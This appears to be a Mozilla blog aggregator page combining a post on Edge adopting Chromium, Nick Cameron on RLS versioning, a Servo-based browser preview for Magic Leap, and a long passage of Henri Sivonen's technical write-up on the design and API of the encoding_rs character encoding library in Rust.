I used to think that WebKit would eat the world, but later on I realized it was Blink. In retrospect this should have been obvious when the mobile version of Microsoft Edge was announced to use Chromium (and not Microsoft's own rendering engine EdgeHTML), but now rumour has it that Edge on its own home turf -- Windows 10 -- will be Chromium too. Microsoft engineers have already been spotted committing to the Chromium codebase, apparently for the ARM version. No word on whether this next browser, codenamed Anaheim, will still be called Edge.

In the sense that Anaheim won't (at least in name) be Google, just Chromium, there's reason to believe that it won't have the repeated privacy erosions that have characterized Google's recent moves with Chrome itself. But given how much DNA WebKit and Blink share, that means there are effectively two current major rendering engines left: Chromium and Gecko (Firefox). The little ones like NetSurf, bless its heart, don't have enough marketshare (or currently features) to rate, Trident in Internet Explorer 11 is intentionally obsolete, and the rest are too deficient to be anywhere near usable (Dillo, etc.). So this means Chromium arrogates more browsershare to itself and Firefox will continue to be the second class citizen until it, too, has too small a marketshare to be relevant. Then Google has eaten the Web. And we are worse off for it.

Bet Mozilla's reconsidering that stupid embedding decision now.

Nick CameronMore on RLS version numbering

In a few days the 2018 edition is going to roll out, and that will include some new framing around Rust's tooling. We've got a core set of developer tools which are stable and ready for widespread use. We're going to have a blog post all about that, but for now I wanted to address the status of the RLS, since when I last blogged about a 1.0 pre-release there was a significant sentiment that it was not ready (and given the expectations that a lot of people have, we agree).

The RLS has been in 0.x-stage development. We think it has reached a certain level of stability and usefulness. While it is not at the level of quality you might expect from a mature IDE, it is likely to be useful for a majority of users.

The RLS is tightly coupled with the compiler, and as far as backwards compatibility is concerned, that is the important thing. So from the next release, the RLS will share a version number with the Rust distribution. We are not claiming this as a '1.0' release, work is certainly not finished, but we think it is worth taking the opportunity of the 2018 edition to highlight the RLS as a usable and useful tool.

In the rest of this blog post I'll go over how the RLS works in order to give you an idea of what works well and what does not, and where we are going (or might go) in the future.

Background

The RLS is a language server for Rust - it is meant to handle the 'language knowledge' part of an IDE (c.f., editing, user interaction, etc.). The concept is that rather than having to develop Rust support from scratch in each editor or IDE, you can do it once in the language server and each editor can be a client. This is a recent approach to IDE development, in contrast to the approach of IntelliJ, Eclipse, and others, where the IDE is designed to make language support pluggable, but language support is closely tied to a specific IDE framework.

The RLS integrates with the Rust compiler, Cargo, and Racer to provide data. Cargo is used as a source of data for orchestrating builds. The compiler provides data for connecting references to definitions, and about types and docs (which is used for 'go to def', 'find all references', 'show type', etc.). Racer is used for code completion (and also to supply some docs). Racer can be thought of as a mini compiler which does as little as possible to provide code completion information as fast as possible.

The traditional approach to IDEs, and how Rust support in IntelliJ works, is to build a completely new compiler frontend, optimised for speed and incremental compilation. This compiler provides enough information to provide the IDE functionality, but usually doesn't do any code generation. This approach is much easier in fairly simple languages like Java, compared to Rust (macros, modules, and the trait system all make this a lot more complex).

There are trade-offs to the two approaches: using a separate compiler is fast and functionality can be limited to ensure it is fast enough. However, there is a risk that the two compilers do not agree on how to compiler a program, in particular, covering the whole of a language like Rust is difficult and so completeness can be an issue. Maintaining a separate compiler also takes a lot of work.

In the future, we hope to further optimise the Rust compiler for IDE cases so that it is fast enough that the user never has to wait, and to use the compiler for code completion. We also want to work with Cargo a bit differently so that there is less duplication of logic between Cargo and the RLS.

Current status

For each feature of the RLS, I measure its success along two axes: is it fast enough and is it complete (that is, does it work for all code). There are also non-functional issues of resource usage (how much battery and CPU the RLS is using), how often the RLS crashes, etc.

Go to definition

This is usually fast enough: if the RLS is ready, then it is pretty much instant. For large crates, it can take too long for the RLS to be ready, and thus we are not fast enough. However, usually using slightly stale data for 'go to def' is not a problem, so we're ok.

It is fairly complete. There are some issues around macros - if a definition is created by a macro, then we often have trouble. 'Go to def' is not implemented for lifetimes, and there are some places we don't have coverage (inside where clauses was recently fixed).

Show type

Showing types and documentation on hover has almost the same characteristics as 'go to definition'.

Rename

Renaming is similar to 'find all references' (and 'go to def'), but since we are modifying the user's code, there are some more things that can go wrong, and we want to be extra conservative. It is therefore a bit less complete than 'go to def', but similarly fast.

Code completion

Code completion is generally pretty fast, but often incomplete. This is because method dispatch in Rust is really complicated! Eventually, we hope that using the compiler for code completion rather than Racer will solve this problem.

Resource usage

The RLS is typically pretty heavy on the CPU. That is because we prioritise having results quickly over minimising CPU usage. In the future, making the compiler more incremental should give big improvements here.

Crashes

The RLS usually only crashes when it disagrees with Cargo about how to build a project, or when it exercises a code path in the compiler which would not be used by a normal compile, and that code path has a bug. While crashes are more common than I'd like, they're a lot rarer than they used to be, and should not affect most users.

Project structure

There is a remarkable variety in the way a Rust project can be structured. Multiple crates can be arranged in many ways (using workspaces, or not), build scripts and procedural macros cause compile-time code execution, and there are Cargo features, different platforms, tests, examples, etc. This all interacts with code which is edited but not yet saved. Every different configuration can cause bugs.

I think we are mostly doing well here, as far as I know there are no project structures to avoid (but this has been a big source of trouble in the past).

Overall

The RLS is clearly not done. It's not in the same league as IDE support for more mature languages. However, I think that it is at a stage where it is worth trying for many users. Stability is good enough - it's unlikely you'll have a bad experience. It does somewhat depend on how you use an IDE: if you rely heavily on code completion (in particular, if you use code completion as a learning tool), then the RLS is probably not ready. However, we think we should encourage new users to Rust to try it out.

So, while I agree that the RLS is not 'done', neither is it badly unstable, likely to be disappear, or lacking in basic functionality. For better or worse, 1.0 releases seem to have special significance in the Rust community. I hope the version numbering decision sends the right message: we're ready for all Rust users to use the RLS, but we haven't reached 'mission accomplished' (well, maybe in a 'George W Bush' way).

More on that version number

The RLS will follow the Rust compiler's version number, i.e., the next release will be 1.31.0. From a strict semver point of view this makes sense since the RLS is only compatible with its corresponding Rust version, so incrementing the minor version with each Rust release is the right thing to do. By starting at 1.31, we're deliberately avoiding the 1.0 label.

In terms of readiness, it's important to note that the RLS is not a user-facing piece of software. I believe the 1.x version number is appropriate in that context - if you want to build an IDE, then the RLS is stable enough to use as a library. However, it is lacking some user-facing completeness and so an IDE built using the RLS should probably not use the 1.0 number (our VSCode extension will keep using 0.x).

The future

There's been some discussion about how best to improve the IDE experience in Rust. I believe the language server approach is the correct one, but there are several options to make progress: continue making incremental improvements to the compiler and RLS, moving towards compiler-driven code completion; use an alternate compiler frontend (such as Rust analyzer); improve Racer and continue to rely on it for code completion; some hybrid approach using more than one of these ideas.

When assessing these options, we need to take into account the likely outcome, the risk of something bad happening, the amount of work needed, and the long-term maintenance burden. The main downside of the current path is the risk that the compiler will never get fast enough to support usable code completion. Implementation is also a lot of work, however, it would mostly help with compile time issues in general. With the other approaches there is a risk that we won't get the completeness needed for useful code completion. The implementation work is again significant, and depending on how things pan out, there is a risk of much costlier long-term maintenance.

I've been pondering the idea of a hybrid approach: using the compiler to provide information about definitions (and naming scopes), and either Racer or Rust Analyzer to do the 'last mile' work of turning that into code completion suggestions (and possibly resolving references too). That might mean getting the best of both worlds - the compiler can deal with a lot of complexity where speed is not as necessary, and the other tools get a helping hand with the stuff that has to be done quickly.

Orthogonally, there is also work planned to better integrate with Cargo and to support more features, as well as some 'technical debt' issues, such as better testing.

Mozilla VR BlogA new browser for Magic Leap

A new browser for Magic Leap

Today, we’re making available an early developer preview of a browser for the Magic Leap One device. This browser is built on top of our Servo engine technology and shows off high quality 2D graphics and font rendering through our WebRender web rendering library, and more new features will soon follow.

While we only support basic 2D pages today and have not yet built the full Firefox Reality browser experience and published this into the Magic Leap store, we look forward to working alongside our partners and community to do that early in 2019! Please try out the builds, provide feedback, and get involved if you’re interested in the future of mixed reality on the web in a cutting-edge standalone headset. And for those looking at Magic Leap for the first time, we also have an article on how the work was done.

Henri Sivonenencoding_rs: a Web-Compatible Character Encoding Library in Rust

encoding_rs is a high-decode-performance, low-legacy-encode-footprint and high-correctness implementation of the WHATWG Encoding Standard written in Rust. In Firefox 56, encoding_rs replaced uconv as the character encoding library used in Firefox. This wasn’t an addition of a component but an actual replacement: uconv was removed when encoding_rs landed. This writeup covers the motivation and design of encoding_rs, as well as some benchmark results.

Additionally, encoding_rs contains a submodule called encoding_rs::mem that’s meant for efficient encoding-related operations on UTF-16, UTF-8, and Latin1 in-memory strings—i.e., the kind of strings that are used in Gecko C++ code. This module is discussed separately after describing encoding_rs proper.

The C++ integration of encoding_rs is not covered here and is covered in another write-up instead.

TL;DR

Rust’s borrow checker is used with on-stack structs that get optimized away to enforce an “at most once” property that matches reads and writes to buffer space availability checks in legacy CJK converters. Legacy CJK converters are the most risky area in terms of memory-safety bugs in a C or C++ implementation.

Decode is very fast relative to other libraries with the exception of some single-byte encodings on ARMv7. Particular effort has gone into validating UTF-8 and converting UTF-8 to UTF-16 efficiently. ASCII runs are handled using SIMD when it makes sense. There is tension between making ASCII even faster vs. making transitions between ASCII and non-ASCII more expensive. This tension is the clearest when encoding from UTF-16, but it’s there when decoding, too.

By default, there is no encode-specific data other than 32 bits per single-byte encoding. This makes legacy CJK encode extremely slow by default relative to other libraries but still fast enough in for the browser use cases. That is, the amount of text one could reasonably submit at a time in a form submission encodes so fast even on a Raspberry Pi 3 (standing in for a low-end phone) that the user will not notice. Even with only 32 bits of encode-oriented data, multiple single-byte encoders are competitive with ICU though only the windows-1252 applied to ASCII or almost ASCII input is competitive with Windows system encoders. Faster CJK legacy encode is available as a compile-time option. But ideally, you should only be using UTF-8 for output anyway.

(If you just want to see the benchmarks and don’t have time for the discussion of the API and implementation internals, you can skip to the benchmarking section.)

Scope

Excluding the encoding_rs::mem submodule, which is discussed after encoding_rs proper, encoding_rs implements the character encoding conversions defined in the Encoding Standard as well as the mapping from labels (i.e. strings in protocol text that identify encodings) to encodings.

Specifically, encoding_rs does the following:

  • Decodes a stream of bytes in an Encoding Standard-defined character encoding into valid aligned native-endian in-RAM UTF-16 (units of u16).
  • Encodes a stream of potentially-invalid aligned native-endian in-RAM UTF-16 (units of u16) into a sequence of bytes in an Encoding Standard-defined character encoding as if the lone surrogates had been replaced with the REPLACEMENT CHARACTER before performing the encode. (Gecko’s UTF-16 is potentially invalid.)
  • Decodes a stream of bytes in an Encoding Standard-defined character encoding into valid UTF-8.
  • Encodes a stream of valid UTF-8 into a sequence of bytes in an Encoding Standard-defined character encoding. (Rust’s UTF-8 is guaranteed-valid.)
  • Does the above in streaming (input and output split across multiple buffers) and non-streaming (whole input in a single buffer and whole output in a single buffer) variants.
  • Avoids copying (borrows) when possible in the non-streaming cases when decoding to or encoding from UTF-8.
  • Resolves textual labels that identify character encodings in protocol text into type-safe objects representing the those encodings conceptually.
  • Maps the type-safe encoding objects onto strings suitable for returning from document.characterSet.
  • Validates UTF-8 (in common instruction set scenarios a bit faster for Web workloads than the Rust standard library; hopefully will get upstreamed some day) and ASCII.

Notably, the JavaScript APIs defined in the Encoding Standard are not implemented by encoding_rs directly. Instead, they are implemented in Gecko as a thin C++ layer that calls into encoding_rs.

Why is a Character Encoding Conversion Library Even Needed Anymore?

The Web is UTF-8 these days and Rust uses UTF-8 as the in-RAM Unicode representation, so why is a character encoding conversion library even needed anymore? The answer is, of course, “for legacy reasons”.

While the HTML spec requires the use of UTF-8 and the Web is over 90% UTF-8 (according to W3Techs, whose methodology is questionable considering that they report e.g. ISO-8859-1 separately from windows-1252 and GB2312 separately from GBK even though the Web Platform makes no such distinctions, but Google hasn’t published their numbers since 2012), users still need to access the part of the Web that has not migrated to UTF-8 yet. That part does not consist only of ancient static pages, either. For example, in Japan there are still news sites that publish new content every day in Shift_JIS. Over here in Finland, I do my banking using a Web UI that is still encoded in ISO-8859-15.

Another side of the legacy is inside the browser engine. Gecko, JavaScript and the DOM API originate from the 1990s when the way to represent Unicode in RAM was in 16-bit units as can also been seen in other software from that era, such as Windows NT, Java, Qt and ICU. (Unicode was formally extended beyond 16 bits in Unicode 2.0 in 1996 but non-Private Use Characters were not assigned outside the Basic Multilingual Plane until Unicode 3.1 in 2001.)

Why a Rewrite?

Regardless of the implementation language, the character encoding library in Gecko was in need of a rewrite for three reasons:

  1. The addition of Rust code in Firefox brought about the need to be able to convert to and from UTF-8 directly and in terms of binary size, it didn’t make sense to have distinct libraries for converting to and from UTF-16 and for converting to and from UTF-8. Instead, a unified library using the same lookup tables for both was needed. The old code wasn’t designed to yield both UTF-16-targeting and UTF-8-targeting machine code from the same source. The addition of an efficient capability to decode to UTF-8 or to encode from UTF-8 would have involved a level of change comparable to a rewrite.

  2. The old library was crufty enough that it was easier to make correctness improvements by the means of a rewrite than by the means of incremental fixes.

    In Firefox 43, I had already rewritten the Big5 decoder and encoder in C++, because a rewrite was easier than modifying the old code. In that particular case, the old code used the Private Use Area (PUA) of the Basic Multilingual Plane (BMP) for Hong Kong Supplementary Character Set (HKSCS) characters. However, after the old code was written, HKSCS characters had been assigned proper code points in Unicode, but many of the assignments are on the Supplementary Ideographic Plane (Plane 2). When a fundamental assumption, such as all the characters in an encoding mapping to the BMP, no longer holds, a rewrite is easier than an incremental change.

    As another example (that showed up after the initial rewrite proposal but before the implementation got properly going), the ISO-2022-JP decoder had an XSS vulnerability that was difficult to fix without restructuring the existing code. I actually tried to write a patch for the old code and gave up.

    In general, the code structure of the old multi-byte decoders differed from the spec text so much that it would have been harder to try to figure out if the code does what the spec requires than to write new code according to the spec.

  3. The old code was written at a time when the exact set of behaviors that Web-exposed character encodings exhibit wasn’t fully understood. For this reason, the old code had generality that is no longer useful now that we know the full set of Web-exposed legacy encodings and can be confident that there will be no additional legacy encodings introduced with additional behaviors anymore.

    As the most notable example, the old code assumed that the lower half of single-byte encodings might not be ASCII. By the time of planning encoding_rs, single-byte encodings whose lower half wasn’t ASCII had already been removed as part of previous Encoding Standard-compliance efforts. Some of the multi-byte encoding handling code also had configurability for the single-byte mode that allowed for non-ASCII single-byte mode. However, some multi-byte encodings had already been migrated off the generic two-byte encoding handling code years ago.

    There had been generic two-byte encoding handling code, but it no longer made sense when only EUC-KR remained as an encoding exhibiting the generic characteristics. Big5 was able to decode to Plane 2, GBK had grown four-byte sequences as part of the evolution to GB18030, EUC-JP had grown support for three-byte sequences in order to support JIS X 0212 and Shift_JIS never had the EUC structure to begin with and had single-byte half-width katakana. Even EUC-KR itself had deviated from the original EUC structure by being extended to support all precomposed Hangul syllables (not just the ones in common use) in windows-949.

When a rewrite made sense in any case, it made sense to do the rewrite in Rust, because a rewrite of a clearly identifiable subsystem is exactly the kind of thing that is suitable for rewriting in Rust and the problem domain could use memory-safety. The old library was created in early 1999, but it still had a buffer overrun discovered in it in 2016 (in code added in the 2001 and 2002). This shows that the notion that code written in a memory-unsafe language becomes safe by being “battle-hardened” if it has been broadly deployed for an extended period of time is a myth. Memory-safety needs a systematic approach. Calendar time and broad deployment are not sufficient to turn unsafe code into safe code.

(The above-mentioned bug discovered in 2016 wasn’t the last uconv security bug to be fixed. In 2018, a memory-safety-relevant integer overflow bug was discovered in uconv after uconv had already been replaced with encoding_rs in non-ESR Firefox but uconv was still within security support in ESR. However, that bug was in the new Big5 code that I wrote for Firefox 43, so it can’t be held against the ancient uconv code. I had fixed the corresponding encoding_rs bug before encoding_rs landed in Firefox 56. The uconv bug was fixed in Firefox ESR 52.7.)

Why not ICU or rust-encoding?

As noted above, a key requirement was the ability to decode to and from both UTF-16 and UTF-8, but ICU supports only decoding to and from UTF-16 and rust-encoding supports only decoding to and from UTF-8. Perhaps one might argue that pivoting via another UTF would be fast enough, but experience indicated that pivoting via another UTF posed at least a mental barrier: Even after the benefits of UTF-8 as an in-memory Unicode representation were known, Gecko subsystems had been written to use UTF-16 because that was what uconv decoded to.

A further problem with ICU is that it does not treat the Encoding Standard as its conformance target. Chrome patches ICU substantially for conformance. I didn’t want to maintain a similar patch set in the Gecko context and instead wanted a library that treats the Encoding Standard as its conformance target.

The invasiveness of the changes to rust-encoding that would have been needed to meet the API design, performance and UTF-16 targeting goals would have been large enough that it made sense to pursue them in a new project instead of trying to impose the requirements onto an existing project.

API Design Problems

In addition to internal problems, uconv also had a couple of API design problems. First, the decoder API lacked the ability to signal the end of the stream. This meant that there was no way for the decoder to generate a REPLACEMENT CHARACTER when the input stream ended with an incomplete byte sequence. It was possible for the caller to determine from the status code if the last buffer passed to the decoder ended with an incomplete byte sequence, but then it was up to the caller to generate the REPLACEMENT CHARACTER in that situation even though the decoder was generally expected to provide this service. As a result, only one caller in the code base, the TextDecoder implementation, did the right thing. Furthermore, even though the encoder side had an explicit way to signal the end of the stream, it was a separate method leading to more complexity for callers than just being able to say that a buffer is the last buffer.

Additionally, the API contract was unclear on whether it was supposed to fill buffers exactly potentially splitting a surrogate pair across buffer boundaries or whether it was supposed to guarantee output validity on a per-method call basis. In a situation where the input and output buffers were exhausted simultaneously, it was unspecified whether the converter should signal that the input was exhausted or that the output was exhausted. In cases where it wasn’t the responsibility of the converter to handle the replacement of malformed byte sequences when decoding or unmappable characters when encoding, the API left needlessly much responsibility to the caller to advance over the faulty input and to figure out what the faulty input was in the case where that mattered, i.e. when encoding and producing numeric character references for unmappable characters.

Character encoding conversion APIs tend to exhibit common problems, so the above uconv issues didn’t make uconv particularly flawed compared to other character encoding conversion APIs out there. In fact, to uconv’s credit at least in the form that it had evolved into by the time I got involved, given enough output space uconv always consumed all the input provided to it. This is very important from the perspective of API usability. It’s all too common for character encoding conversion APIs to backtrack if the input buffer ends with an incomplete byte sequence and to report the incomplete byte sequence at the end of the input buffer as not consumed. This leaves it to the caller to take those unconsumed bytes and to copy them to the start of the next buffer so that they can be completed by the bytes that follow. Even worse, sometimes this behavior isn’t documented and is up to the caller of the API to discover by experimentation. This behavior also imposes a, typically undocumented, minimum input buffer size, because the input buffer has to be large enough for at least one complete byte sequence to fit. If the input trickles in byte by byte, it’s up to the caller to arrange them into chunks large enough to contain a complete byte sequence.

Sometimes, the API design problem described in the previous paragraph is conditional on requesting error reporting. When I was writing the Validator.nu HTML Parser, I discovered that the java.nio.charset character encoding conversion API was well-behaved when it was asked to handle errors on its own, but when the caller asked for the errors to be reported, the behavior undocumentedly changed to not consuming all the input offered even if there was enough output space. This was because the error reporting mechanism sought to designate the exact bytes in error by giving the caller the number of erroneous bytes corresponding to a single error. In order to make a single number make sense, the bytes always had to be counted backwards from the current position, which meant that the current position had to be placed such that it was at the end of the erroneous sequence and additionally the API sought to make it so that the entire erroneous sequence was in the buffer provided and not partially in a past already discarded buffer.

Additionally, as a more trivial to describe matter, but as a security-wise potentially very serious matter, some character encoding conversion APIs offer to provide a mode that ignores errors. Especially when decoding and especially in the context of input such as HTML that has executable (JavaScript) and non-executable parts, silently dropping erroneous byte sequences instead of replacing them with the REPLACEMENT CHARACTER is a security problem. Therefore, it’s a bad idea for character encoding conversion API to offer a mode where errors are neither signaled to the caller nor replaced with the REPLACEMENT CHARACTER.

Finally, some APIs fail to provide a high-performance streaming mode where the caller is responsible for output buffer allocation. (This means two potential failures: First, failure to provide a streaming mode and, second, providing a streaming mode but converter seeks to control the output buffer allocation.)

In summary, in my experience, common character encoding conversion API design problems are the following:

  • Failure to provide a streaming mode
    • E.g. the kernel32 conversion APIs
  • In streaming mode, failure to let the caller signal the end of the stream
    • E.g. uconv decode API and Qt (.NET can signal this but the documentation says the converter ignores the invalid bytes at the end in that case! I hope the docs are wrong.)
  • In streaming mode, having a separate API entry point for signaling the end of the stream (as opposed to being able to flag a buffer as the last buffer) resulting in two API entry points that can generate output
    • E.g. uconv encode API
  • In streaming mode, given sufficient output space, failure to consume all provided input
    • E.g. java.nio.charset in error reporting mode, rust-encoding and iconv
  • In streaming mode, seeking to identify which bytes were in error but doing so with too simplistic mechanism leading to also having to have the problem from the previous item
    • E.g. java.nio.charset
  • In streaming mode, causing memory allocation when a conversion call is on the stack (as opposed to letting the caller be fully in charge of allocating buffers)
    • E.g. Qt, WebKit and rust-encoding
  • In streaming mode, failure to guarantee that the exhaustion of the input buffer is the condition that is reported if both the input and output buffers are exhausted at the same time
    • E.g. uconv
  • In streaming mode, seeking to fill the output buffer fully (even if doing so e.g. splits a surrogate pair) instead of guaranteeing that the output is valid on a per-buffer basis
    • E.g. ICU by documentation; many others silent on this matter in documentation, so who knows
  • Providing a mode that silently ignores erroneous input sequences
    • E.g. rust-encoding, java.nio.charset

All but the last item are specific to a streaming mode. Streaming is hard.

Other Design Considerations

There are other API design considerations that would be unfair to label as “problems”, but that are still very relevant to designing a new API. These relate mainly to error handling and byte order mark (BOM) handling.

Replacement of Errors

It is typical for character encoding conversion APIs to treat error handling as a mode that is set on a converter object as opposed to treating error handling as a different API entry point. API-wise it makes sense to have different entry points in order to have different return values for the two cases. Specifically, when the converter handles errors, the status of the conversion call cannot be that conversion stopped on an error for the caller to handle. Additionally, when the converter handles errors, it may make sense to provide a flag that indicates whether there where errors even though they were automatically handled.

Implementation-wise, experience suggests that baking error handling into each converter complicates code considerably and adds opportunities for bugs. Making the converter implementation always signal errors and having an optional wrapper that deals with those errors so that the application developer doesn’t need to leads to a much cleaner design. This design is a natural match for exposing different entry points: one entry point goes directly to the underlying converter and the other goes through the wrapper.

BOM Handling

BOM sniffing is subtle enough that it is a bad idea to leave it to the application. It’s more robust to bake it into the conversion library. In particular, getting BOM sniffing right when bytes arrive one at a time is not trivial for applications to handle. Like replacement of errors, different BOM handling modes can be implemented as wrappers around the underlying converters.

Extensibility

Especially in languages that provide a notion of inheritance, interfaces or traits it is alluring for the API designer to seek to define an abstract conversion API that others can write more converters for. However, in the case of the Web, the set of encodings is closed and includes only those that are defined in the Encoding Standard. As far as the use cases in the Web context go, extensibility is not needed. On the contrary, especially in a code base that is also used in a non-Web context like Gecko is used in Thunderbird in the email context, it is a feature that we can be confident on the Web side that if we have a type that represents an encoding defined in the Encoding Standard it can’t exhibit behaviors from outside the Encoding Standard. By design, encoding_rs is not extensible, so an encoding_rs Encoding does not represent any imaginable character encoding but instead represents a character encoding from the Encoding Standard. For example, we know from the type that we don’t accidentally have a UTF-7 decoder in Gecko code that has Web expectations even though Thunderbird contains a UTF-7 decoder in its codebase. (If you are interested in decoding email in Rust, there is a crate that wraps encoding_rs, adds UTF-7 decoding and maintains a type distinction between Web encodings and email encodings.)

Additionally, in the context of Rust and its Foreign Function Interface (FFI), it helps that references are references to plain structs and not trait objects. Whereas C++ puts a vtable pointer on the objects allowing pointers to polymorphic types to have the same size as C pointers, Rust’s type erasure puts the vtable pointer in the reference. A Rust reference to a struct has the same machine representation as a plain (non-null) C pointer. A Rust reference to a trait-typed thing is actually two pointers: one to the instance and another to the vtable appropriate for the concrete type of the instance. Since interoperability with C++ is a core design goal for encoding_rs, using the kind of types whose references are the same as C pointers avoids the problem of losing the vtable pointer when crossing the FFI boundary.

Iterators vs. Slices

Conceptually a character encoding is a mapping from a stream of bytes onto a stream of Unicode scalar values and, in most cases, vice versa. Therefore, it would seem that the right abstraction for a converter is an iterator adaptor that consumes an iterator over bytes and yields Unicode scalar values (or vice versa).

There are two problems with modeling character encoding converters as iterator adaptors. First, it leaves optimization to the compiler, when manual optimizations across runs of code units are desirable. Specifically, it is a core goal for encoding_rs to make ASCII handling fast using SIMD, and the compiler does not have enough information about the data to know to produce ASCII-sequence-biased autovectorization. Second, Rust iterators are ill-suited for efficient and (from the C perspective) idiomatic exposure over the FFI.

The API style of unconv, java.nio.charset, iconv, etc., of providing input and output buffers of several code units at a time to the converter is friendly both to SIMD and to FFI (Rust slices trivially decompose to pointer and length in C). While this isn’t 100% rustic like iterators, slices still aren’t unrustic.

The API Design

This finally brings us to the actual API. There are three public structs: Encoding, Decoder and Encoder. From the point of view of the application developer, these act like traits (or interfaces or superclasses to use concepts from other languages) even though they are structs. Instead of using language implementation-provided vtables for dynamic dispatch, they internally have an enum that wraps private structs that are conceptually like subclasses. The use of private enum for dispatch avoids vtable pointers in FFI, makes the hierarchy intentionally non-extensible (see above) and allows BOM sniffing to change what encoding a Decoder is a decoder for.

There is one statically allocated instance of Encoding for each encoding defined in the Encoding Standard. These instances have publicly visible names that allow application code to statically refer to a specific encoding (commonly, you want to do this with UTF-8, windows-1252, and the replacement encoding). To find an Encoding instance dynamically at runtime based on a label obtained from protocol text, there is a static method fn Encoding::for_label(label: &[u8]) -> &'static Encoding.

The Encoding struct provides convenience methods for non-streaming conversions. These are “convenience” methods in the sense that they are implemented on top of Decoder and Encoder. An application that only uses non-streaming conversions only needs to deal with Encoding and doesn’t need to use Decoder and Encoder at all.

Streaming API

Decoder and Encoder provide streaming conversions and are allocated at runtime, because they encapsulate state related to the streaming conversion. On the Encoder side, only ISO-2022-JP is actually stateful, so most of the discussion here will focus on Decoder.

Internally, the encoding-specific structs wrapped by Decoder are macroized to generate decode to UTF-8 and decode to UTF-16 from the same source code (likewise for Encoder). Even though Rust applications are expected to use the UTF-8 case, I’m going to give examples using the UTF-16 case, because it doesn’t involve the distinction between &str and &[u8] which would distract from the more important issues.

The fundamental function that Decoder provides is:
fn decode_to_utf16_without_replacement(
    &mut self,
    src: &[u8],
    dst: &mut [u16],
    last: bool
) -> (DecoderResult, usize, usize)

This function wraps BOM sniffing around an underlying encoding-specific implementation that takes the same arguments and has the same return value. The Decoder-provided wrapper first exposes the input to a BOM sniffing state machine and once the state machine gets out of the way delegates to the underlying implementation. Decoder instances can’t be constructed by the application directly. Instead, they need to be obtained from factory functions on Encoding. The factory functions come in three flavors for three different BOM sniffing modes: full BOM sniffing (the default), which may cause the Decoder to morph into a decoder for a different encoding than initially (using enum for dispatch shows its usefulness here!), BOM removal (no morphing but the BOM for the encoding itself is skipped) and without BOM handling. The struct is the same in all cases, but the different factory methods initialize the state of the BOM sniffing state machine differently.

The method takes an input buffer (src) and an output buffer (dst) both of which are caller-allocated. The method then decodes bytes from src into Unicode scalar values that are stored (as UTF-16) into dst until one of the following three things happens:

  1. A malformed byte sequence is encountered.
  2. All the input bytes have been processed.
  3. The output buffer has been filled so near capacity that the decoder cannot be sure that processing an additional byte of input wouldn’t cause so much output that the output buffer would overflow.

The return value is a tuple of a status indicating which one of the three reasons to return happened, how many input bytes were read and how many output code units were written. The status is a DecoderResult enumeration (possibilities Malformed, InputEmpty and OutputFull corresponding to the three cases listed above).

The output written into dst is guaranteed to be valid UTF-16, and the output after each call is guaranteed to consist of complete characters. (I.e. the code unit sequence for the last character is guaranteed not to be split across output buffers.) This implies that the output buffer must be long enough for an astral character to fit (two UTF-16 code units) and the output buffer might not be fully filled. While it may seem wasteful not to fill the last slot of the output buffer in the common case, this design significantly simplifies the implementation while also simplifying callers by guaranteeing to the caller that it won’t have to deal with split surrogate pairs.

The boolean argument last indicates that the end of the stream is reached when all the bytes in src have been consumed.

A Decoder object can be used to incrementally decode a byte stream. During the processing of a single stream, the caller must call the method zero or more times with last set to false and then call decode_* at least once with last set to true. If the decode_* with last set to true returns InputEmpty, the processing of the stream has ended. Otherwise, the caller must call decode_* again with last set to true (or treat a Malformed result as a fatal error).

Once the stream has ended, the Decoder object must not be used anymore. That is, you need to create another one to process another stream. Unlike with some other libraries that encourage callers to recycle converters that are expensive to create, encoding_rs guarantees that converters are extremely cheap to create. (More on this later.)

When the decoder returns OutputFull or the decoder returns Malformed and the caller does not wish to treat it as a fatal error, the input buffer src may not have been completely consumed. In that case, the caller must pass the unconsumed contents of src to the method again upon the next call.

Typically the application doesn’t wish to do its own error handling and just wants errors to be replaced with the REPLACEMENT CHARACTER. For this use case, there is another method that wraps the previous method and provides the replacement. The wrapper looks like this:
fn decode_to_utf16(
    &mut self,
    src: &[u8],
    dst: &mut [u16],
    last: bool
) -> (CoderResult, usize, usize, bool)

Notably, the status enum is different, because the case of malformed sequences doesn’t need to be communicated to the application. Also, the return tuple includes a boolean flag to indicate whether there where errors.

Additionally, there is a method for querying the worst case output size even the current state of the decoder and the length of an input buffer. If the length of the output buffer is at least the worst case, the decoder guarantees that it won’t return OutputFull.

Identifying Malformed Sequences

Initially, the plan was simply not to support applications that need to identify which input bytes were in error, because I thought that it wasn’t possible to do so without complicating the API for everyone else. However, very early into the implementation phase, I realized that it is possible to identify which bytes are in error without burdening applications that don’t care if the applications that want to know are responsible for remembering the last N bytes decoded where N is relatively small. It turns out that N is 6.

For a malformed sequence that corresponds to a single decode error (i.e. a single REPLACEMENT CHARACTER) a DecoderResult::Malformed(u8, u8) is returned. The first wrapped integer indicates the length of the malformed byte sequence. The second wrapped integer indicates the number of bytes that were consumed after the malformed sequence. If the second integer is zero, the last byte that was consumed is the last byte of the malformed sequence. The malformed bytes may have been part of an earlier input buffer, which is why it is the responsibility of the application that wants to identify the bytes that were in error.

The first wrapped integer can have values 1, 2, 3 or 4. The second wrapped integer can have values 0, 1, 2 or 3. The worst-case sum of the two is 6, which happens with ISO-2022-JP.

Identifying Unmappable Characters

When encoding to an encoding other than UTF-8 (the Encoding Standard does not support encoding into UTF-16LE or UTF-16BE, and there is one Unicode scalar value that cannot be encoded into gb18030), it is possible that the encoding cannot represent a character that is being encoded. In this case, instead of returning backward-looking indices EncoderResult::Unmappable(char) wraps the Unicode scalar value that needs to be replaced with a numeric character reference when performing replacement. In the case of ISO-2022-JP, this Unicode scalar value can be the REPLACEMENT CHARACTER instead of a value actually occurring in the input if the input contains U+000E, U+000F, or U+001B.

This asymmetry between how errors are signaled in the decoder and encoder scenarios makes the signaling appropriate for each scenario instead of optimizing for consistency where consistency isn’t needed.

Non-Streaming API

As noted earlier, Encoding provides non-streaming convenience methods built on top of the streaming functionality. Instead of being simply wrappers for the streaming conversion, the non-streaming methods first try to check if the input is borrowable as output without conversion. For example, if the input is all ASCII and the encoding is ASCII-compatible, a Cow borrowing the input is returned. Likewise, the input is borrowed when the encoding is UTF-8 and the input is valid or when the encoding is ISO-2022-JP and the input contains no escape sequences. Here’s an example of a non-streaming conversion method:
fn decode_with_bom_removal<'a>(
    &'static self,
    bytes: &'a [u8]
) -> (Cow<'a, str>, bool)

